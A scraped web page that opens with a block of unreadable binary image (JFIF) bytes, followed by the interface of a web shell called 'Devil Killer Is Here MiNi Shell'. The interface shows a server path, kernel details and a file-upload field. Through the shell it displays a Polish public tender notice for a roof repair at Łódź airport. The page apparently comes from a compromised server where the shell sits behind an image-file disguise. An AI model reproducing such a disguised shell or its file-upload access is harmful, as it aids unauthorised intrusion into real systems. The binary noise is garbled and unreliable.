JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220204/0004753501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont dachu OKRL Łódź na terenie Portu Lotniczego Łódź im. Władysława Reymonta </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Polska Agencja Żeglugi Powietrznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 140886771</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wieżowa 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-147</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@pansa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pansa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zapewnienie służby żeglugi powietrznej, zarządzanie przestrzenią powietrzną oraz zarządzanie przepływem ruchu lotniczego </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont dachu OKRL Łódź na terenie Portu Lotniczego Łódź im. Władysława Reymonta </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f3719fc6-84cb-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00047535</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://portal.smartpzp.pl/pazp/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://portal.smartpzp.pl/pazp/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z Rejestrem zamówień publicznych PAŻP – znak postępowania: 32/PAŻP/2022/AZP,<br/>wykonawcy winni we wszelkich kontaktach z Zamawiającym powoływać się na wyżej podane<br/>oznaczenie, z uwzględnieniem przyjętej przez Zamawiającego nazwy postępowania.<br/>2. Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej za<br/>pośrednictwem Platformy pod adresem: https://portal.smartpzp.pl/pazp.<br/>3. Korzystanie z Platformy przez wykonawcę jest bezpłatne.<br/>4. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ. Wniosek<br/>wykonawca składa za pośrednictwem Platformy, w zakładce „Pytania do postępowania”. Czynność ta<br/>nie wymaga logowania się na Platformie.<br/>5. Treść zapytań, bez ujawniania źródła zapytania, wraz z wyjaśnieniami Zamawiający udostępni na<br/>Platformie w zakładce „Dokumentacja postępowania”.<br/>6. Wykonawca chcąc w pełni korzystać z możliwości Platformy (w tym z możliwości złożenia oferty)<br/>musi się zarejestrować się wybierając zakładkę „Załóż konto”. Wykonawca rejestrując się akceptuje<br/>warunki korzystania z Platformy, określone w Regulaminie podczas rejestracji oraz uznaje go za<br/>wiążący.<br/>7. Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:<br/>- dla dokumentów w formacie „pdf” zaleca się podpis w formacie PAdES,<br/>- dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES.<br/>UWAGA:<br/>W zależności od użytego formatu kwalifikowanego podpisu (PAdES, XAdES) i jego typu (zewnętrzny,<br/>wewnętrzny) wykonawca dołącza uprzednio podpisane dokumenty i oświadczenia wraz z<br/>wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ<br/>wewnętrzny). Zamawiający zaleca stosowanie podpisu wewnętrznego, który polega na tym, że jest<br/>zapisany łącznie z podpisywanym dokumentem (tworzą jeden plik), a nie oddzielnie (plik podpisywany i<br/>plik podpisu).<br/>Szczegółowy sposób utworzenia podpisu wewnętrznego zawarty jest w instrukcji użytkownika<br/>programu, za pomocą którego składany jest kwalifikowany podpis elektroniczny.<br/>8. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie Portalu e-usług (Platforma).<br/>9. Zamawiający dopuszcza przesyłanie danych w formatach: .png, .jpg, .jpeg, .gif, .doc, .docx, .xls,<br/>.xlsx, .ppt, .pptx, .odt, .ods, .odp, . pdf, .zip, .rar, .7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, . msg, przy<br/>czym zaleca się wykorzystywanie plików w formacie .pdf. Maksymalny rozmiar pojedynczego pliku<br/>przesyłanego za pośrednictwem Platformy to 100 MB, przy czym nie określa się limitu liczby plików.<br/>10. Informacja na temat kodowania i czasu odbioru danych:<br/>- pliki załączone przez wykonawcę na Platformie i zapisane, widoczne są w Platformie jako zaszyfrowane. Możliwość otworzenia plików dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu otwarcia ofert;<br/>- czas serwera jest synchronizowany z czasem udostępnionym przez Główny Urząd Miar, za datę<br/>odebrania danych od wykonawcy uznaje się czas zapisu danych a następnie wyświetlenia informacji o<br/>pozytywnym przyjęciu oferty do systemu.<br/>11. Dokumentacja postępowania dostępna jest na Platformie w zakładce „Dokumentacja<br/>postępowania”.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">http://portal.smartpzp.pl/pazp/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) Dz. Urz. UE L 119,<br/>zwanego w dalszej części „RODO”, informujemy, że:<br/>1. Polska Agencja Żeglugi Powietrznej z siedzibą w Warszawie (dalej „PAŻP”), ul. Wieżowa 8, 02-147<br/>Warszawa, e-mail: info@pansa.pl, tel. (+ 48 22) 574 50 01, przetwarza dane osobowe jako<br/>administrator danych osobowych.<br/>2. Administrator wyznaczył Inspektora Ochrony Danych (IOD) z którym można się skontaktować<br/>poprzez adres e-mail: inspektorochronydanych@pansa.pl lub korespondencyjnie (pisemnie) na adres<br/>siedziby administratora.<br/>3. Dane osobowe będą przetwarzane w celu:<br/>1) przeprowadzenia postępowania o udzielenie zamówienia;<br/>2) wyłonienia wykonawcy oraz udzielenia zamówienia poprzez zawarcie umowy w sprawie zamówienia<br/>publicznego;<br/>3) przechowywania dokumentacji postępowania o udzielenie zamówienia na wypadek kontroli<br/>prowadzonej przez uprawnione organy i podmioty;<br/>4) przekazania dokumentacji postępowania o udzielenie zamówienia do archiwum, a następnie jej<br/>zniszczenia.<br/>w zakresie: dane zwykłe – imię, nazwisko, zajmowane stanowisko, miejsce pracy oraz posiadane<br/>kwalifikacje zawodowe wymagane do spełnienia warunków udziału w postępowaniu i realizacji Umowy,<br/>w także w przypadku złożenia pełnomocnictwa, oświadczeń i innych dokumentów – dane osobowe w<br/>nim zawarte.<br/>4. Podstawą prawną przetwarzania danych przez PAŻP jest:<br/>1) art. 6 ust. 1 lit. b RODO - w celu prawidłowego wykonania umowy i w zakresie niezbędnym do<br/>realizacji tego celu PAŻP udostępni wykonawcy zwykłe dane osobowe pracowników PAŻP<br/>wyznaczonych do współpracy z wykonawcą i nadzoru nad realizacją umowy, w postaci imienia i<br/>nazwiska, stanowiska służbowego, adresu e-mail i numeru telefonu służbowego, oraz;<br/>2) art. 6 ust. 1 lit. f RODO - przy czym za prawnie uzasadniony interes PAŻP wskazuje się konieczność<br/>przeprowadzenia postępowania o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">32/PAŻP/2022/AZP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont dachu OKRL Łódź na terenie Portu Lotniczego Łódź<br/>im. Władysława Reymonta. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">77 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawca musi wykazać, iż w ciągu ostatnich 5 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej minimum 1 (jedną)<br/>robotę budowalną polegającą na wykonywaniu pokrycia powierzchni dachu za pomocą<br/>systemowych izolacji płynnych zbrojonych z żywic PMMA o pow. dachu min. 250 m2.<br/>2. Wykonawca skieruje do realizacji zamówienia co najmniej:<br/>a) jedną osobę posiadającą uprawnienia do sprawowania samodzielnych funkcji technicznych w<br/>budownictwie (bez ograniczeń), tj. uprawnienia do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno–budowlanej,<br/>b) jedną osobę posiadającą uprawnienia budowlane do kierowania, nadzorowania i<br/>kontrolowania budowy i robót, kierowania i kontrolowania wytwarzania konstrukcyjnych<br/>elementów sieci i instalacji oraz oceniania i badania stanu technicznego w zakresie sieci i<br/>instalacji elektrycznych – obejmującej instalacje elektryczne, napowietrzne i kablowe linie<br/>energetyczne, stacje i urządzenia elektroenergetyczne.<br/>Zamawiający dopuszcza, aby jedna osoba posiadała ww. uprawnienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – z podaniem przedmiotu roboty<br/>budowlanej, dat wykonania (od-do), podmiotów, na rzecz których roboty budowlane zostały wykonane<br/>(nazwa, adres i telefon) –- opracowany wg druku dołączonego do specyfikacji - załącznik nr 4 do SWZ.<br/>2. Dowody określające należyte wykonanie robót budowlanych uwzględnionych w wykazie, o którym<br/>mowa w pkt 1. powyżej. Dowodami są:<br/>a) referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były<br/>wykonywane, określające czy te roboty budowlane zostały wykonane należycie;<br/>b) jeżeli przyczyn niezależnych od niego nie jest w stanie uzyskać dokumentów, o których mowa w lit.<br/>a) powyżej inne odpowiednie dokumenty dla wykazywanych robót budowlanych.<br/>3.Wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami .</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium.<br/>2. Przystępując do niniejszego postępowania, każdy wykonawca zobowiązany jest wnieść wadium w wysokości: 7 500 zł (słownie: siedem tysięcy pięćset złotych 00/100).<br/>3. Wadium należy wnieść w formach przewidzianych w art. 97 ust. 7 ustawy.<br/>4. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.<br/>5. W przypadku wadium wnoszonego w pieniądzu, za termin wniesienia uznaje się chwilę<br/>uznania kwoty na rachunku Zamawiającego.<br/>6. Wadium w pieniądzu należy wnieść na rachunek Zamawiającego: Bank Gospodarstwa<br/>Krajowego, Aleje Jerozolimskie 7, 00-955 Warszawa – rachunek 03 1130 1017 0025 0094 4820<br/>0013.<br/>7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97<br/>ust. 7 pkt 2-4 ustawy, wykonawca przekazuje zamawiającemu oryginał gwarancji lub<br/>poręczenia, w postaci elektronicznej za pośrednictwem Platformy.<br/>8. Jako Beneficjenta wadium wnoszonego w formie poręczeń lub gwarancji należy wskazać<br/>Polską Agencję Żeglugi Powietrznej, ul. Wieżowa 8, 02-147 Warszawa.<br/>9. W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby<br/>gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące<br/>utratę wadium przez wykonawcę, określone w art. 98 ust. 6 ustawy.<br/>10. Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe<br/>zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium płatne<br/>na pierwsze pisemne żądanie Zamawiającego. Gwarancja lub poręczenie nie powinny zawierać<br/>klauzul ograniczających w sposób nieuzasadniony odpowiedzialności gwaranta. Dochodzenie<br/>przez Zamawiającego roszczeń z gwarancji lub poręczenia winno być stosunkowo łatwe, a<br/>wniesione wadium powinno pozostawać w dyspozycji Zamawiającego przez cały okres<br/>związania ofertą.<br/>11. Gwarancja lub poręczenie muszą w pełni zabezpieczać interes Zamawiającego w całym<br/>okresie ważności gwarancji lub poręczenia.<br/>12. Zamawiający musi mieć zapewnioną możliwość realnego zaspokojenia się z gwarancji lub<br/>poręczenia po upływie terminu związania ofertą, w przypadku, gdy któraś z okoliczności<br/>wymienionych w art. 98 ust. 6 ustawy wystąpiła w terminie związania ofertą. Przez realną<br/>możliwość zaspokojenia się, Zamawiający rozumie możliwość złożenia żądania zapłaty wadium<br/>w terminie:<br/>a. do 2 dni roboczych po upływie terminu związania ofertą, jeżeli w treści gwarancji lub<br/>poręczenia dopuszczono składanie żądania zapłaty w formie elektronicznej lub<br/>b. do 7 dni roboczych po upływie terminu związania ofertą, jeżeli w treści gwarancji lub<br/>poręczenia wymagane jest składanie żądania zapłaty w formie pisemnej”.<br/>Uwaga! Wymagane jest przedstawienie gwarancji lub poręczenia uwzględniającej powyższe<br/>wymagania. Może to zostać zrealizowane np. poprzez przedstawienie gwarancji lub poręczenia<br/>z okresem ważności dłuższym o ww. terminy, niż termin związania ofertą lub zawarcie w treści<br/>stosownej klauzuli gwarantującej Zamawiającemu możliwość żądania zapłaty wadium po<br/>upływie terminu związania ofertą.<br/>13. Zaleca się aby gwarancja lub poręczenie zawierało informację o adresie e-mail, na który<br/>Zamawiający przekaże gwarantowi lub poręczycielowi oświadczenie o zwolnieniu wadium,<br/>zgodnie z dyspozycją zawartą w art. 98 ust 5 ustawy.<br/>14. W przypadku braku możliwości odczytania pliku stanowiącego wadium (wniesionego w<br/>formie innej niż pieniądz), z przyczyn technicznych nie leżących po stronie Zamawiającego,<br/>spowodowanych przesłaniem pliku np. uszkodzonego, oferta zostanie odrzucona na podstawie<br/>art. 226 ust. 1 pkt 14 ustawy. Wykonawca ponosi odpowiedzialność za przesłanie pliku<br/>technicznie sprawnego (nie uszkodzonego). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z zapisami pkt 2 Rozdziału VII SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Warunki umowy, które uwzględnione będą w przyszłej umowie z wykonawcą wybranym w<br/>wyniku postępowania, zamieszczone są w istotnych postanowieniach umowy – Załącznik nr 2<br/>do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-24 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">SmartPzp</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-24 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – 